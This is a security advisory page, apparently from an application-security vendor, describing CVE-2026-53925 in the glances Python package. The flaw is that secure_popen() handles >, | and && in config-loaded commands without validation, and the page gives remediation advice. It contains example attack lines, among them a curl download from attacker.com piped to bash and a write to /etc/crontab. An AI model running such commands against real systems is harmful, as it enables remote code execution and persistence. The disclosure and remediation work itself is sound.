CVE-2026-53925 is a high-severity path traversal vulnerability in glances (pip), affecting versions >= 4.0.8, < 4.5.5. It is fixed in 4.5.5.
Summary The securepopen() function in glances/secure.py interprets > (file redirection), | (pipe), and && (command chaining) operators in command strings. These operators are applied without any validation on the target file path, piped command, or chained command. When Application Monitoring Process (AMP) modules load their command or servicecmd configuration values from glances.conf, those values are passed directly to securepopen() with no sanitization. This allows an attacker who can modify the Glances configuration file to write arbitrary content to arbitrary filesystem paths (via >), chain arbitrary commands (via &&), or pipe command output to arbitrary programs (via |). Crucially, this vulnerability is not mitigated by the --disable-config-exec flag that was introduced to address CVE-2026-33641. That flag only disables backtick command execution in config.getvalue(); it does not affect the securepopen() function's interpretation of shell-like operators. Details Affected code path 1, Default AMP (glances/amps/default/init.py:69) The command config value is loaded from [amp<name>] sections via GlancesAmp.loadconfig() (glances/amps/amp.py:81): Affected code path 2, SystemV AMP (glances/amps/systemv/init.py:60) The servicecmd config value is loaded from [ampsystemv] sections via the same GlancesAmp.loadconfig() method. Sink, securepopen() (glances/secure.py:33-77) The function explicitly parses: > for file redirection (line 39): cmd.split('>'), the path after > is used directly in open(stdoutredirect, "w") (line 71) with no path validation. | for command piping (line 51): cmd.split('|'), each segment is executed as a separate Popen with stdout piped to the next. && for command chaining (line 27 in securepopen): cmd.split('&&'), each segment is executed sequentially. None of these operators are sanitized or restricted when loading AMP configuration values. Why --disable-config-exec does not help: The --disable-config-exec flag (introduced for CVE-2026-33641) only prevents systemexec() from running backtick-embedded commands in config.getvalue(). It does not affect how the resulting string value is processed by securepopen(). A command value like echo data > /etc/crontab contains no backticks and passes through getvalue() unchanged, then securepopen() interprets the > operator and writes to the arbitrary path. PoC Clean-checkout recipe: Create a test configuration file: Run a Python script that simulates the AMP command execution path: Expected vulnerable output: Negative/control case (demonstrating --disable-config-exec only blocks backticks): Cleanup: Impact An attacker who can modify glances.conf (e.g., through a separate file-write vulnerability, a misconfigured shared filesystem, a configuration management system, or a container volume mount) can: Write arbitrary content to arbitrary files via the > operator, e.g., overwriting /etc/crontab, ~/.ssh/authorizedkeys, or any file writable by the Glances process user. Execute arbitrary commands via the && and | operators, e.g., echo x && curl http://attacker.com/shell.sh | bash. Exfiltrate data via the | operator piping command output to network utilities. The existing --disable-config-exec mitigation for CVE-2026-33641 does not protect against this vulnerability because it operates at a different layer (config.getvalue() backtick processing vs. securepopen() operator interpretation). Suggested remediation Remove file redirection support from securepopen() unless explicitly required. The > operator in _securepopen() (lines 39-45, 69-72) writes to arbitrary paths. Consider removing this feature or restricting output paths to a safe directory (e.g., a configured output directory with path traversal protection). Sanitize AMP command values before passing them to securepopen(). Apply the same sanitization used in actions.py:sanitizemustachedict() to strip &&, |, >>, and > from AMP command and servicecmd config values, or refuse to execute commands containing these operators. Consider replacing securepopen() with subprocess.run(shell=False) using explicit argument arrays. The secure_popen() function reimplements shell-like operator parsing (&&, |, >) which is inherently risky. Standard subprocess.run() with shell=False and an explicit argument list avoids this class of vulnerability entirely. Add a regression test that verifies AMP commands cannot contain file redirection or command chaining operators.
Input manipulates file paths to reach files outside the intended directory, such as configuration or credential files. Typical impact: unauthorized file read or write outside the intended directory.
CVE-2026-53925 has a CVSS score of 7.8 (High). The vector is requires local access, low privileges required, and no user interaction. A CVSS score reflects the worst-case severity of the vulnerability, not your specific exposure. Whether this affects your application depends on whether the vulnerable code is present and reachable in your environment.
A fixed version is available (4.5.5). Upgrading removes the vulnerable code path.
pip
glances (>= 4.0.8, < 4.5.5)glances → 4.5.5 (pip)Severity tells you how bad this could be in the worst case. It does not tell you whether you are exposed. Exploitability and impact are functions of runtime truth: whether the vulnerable code is present, reachable, and actually executes in your application. A vulnerable package can sit in your dependency tree and never run.
Kodem, an Intelligent Application Security platform, uses runtime intelligence to reveal which vulnerabilities actually execute in production, so teams prioritize the ones that genuinely matter instead of chasing every advisory.
Kodem's runtime-powered SCA identifies whether CVE-2026-53925 is reachable in your applications. Explore open-source security for your team.
See if CVE-2026-53925 is reachable in your applications. Get a demo
Already deployed Kodem? See CVE-2026-53925 in your environment →Upgrade glances to 4.5.5 or later to resolve this vulnerability.
Kodem Kai can prioritize this vulnerability in your dependency tree and generate a fix recommendation.
CVE-2026-53925 is a high-severity path traversal vulnerability in glances (pip), affecting versions >= 4.0.8, < 4.5.5. It is fixed in 4.5.5. Input manipulates file paths to reach files outside the intended directory, such as configuration or credential files.
CVE-2026-53925 has a CVSS score of 7.8 (High). This score reflects the worst-case severity of the vulnerability, not your specific exposure. Whether it represents real risk in your environment depends on whether the vulnerable code is present and reachable.
glances (pip) versions >= 4.0.8, < 4.5.5 is affected.
Yes. CVE-2026-53925 is fixed in 4.5.5. Upgrade to this version or later.
Whether CVE-2026-53925 is exploitable in your environment depends on whether the vulnerable code is present and reachable. A CVSS score is a worst-case rating; it does not account for your specific deployment, configuration, or usage patterns. Kodem, an Intelligent Application Security platform, uses runtime intelligence to show which vulnerabilities actually execute in production, so you can focus on the ones that represent real risk. Get a demo
Exploitability and impact are not fixed properties of a CVE. They depend on runtime truth: whether the vulnerable code is present, reachable, and actually executes in your application. A high CVSS score on a dependency that never runs is not the same as real risk. Kodem, an Intelligent Application Security platform, uses runtime intelligence to reveal which vulnerabilities actually execute in production, so teams prioritize the ones that genuinely matter.
Upgrade glances to 4.5.5 or later.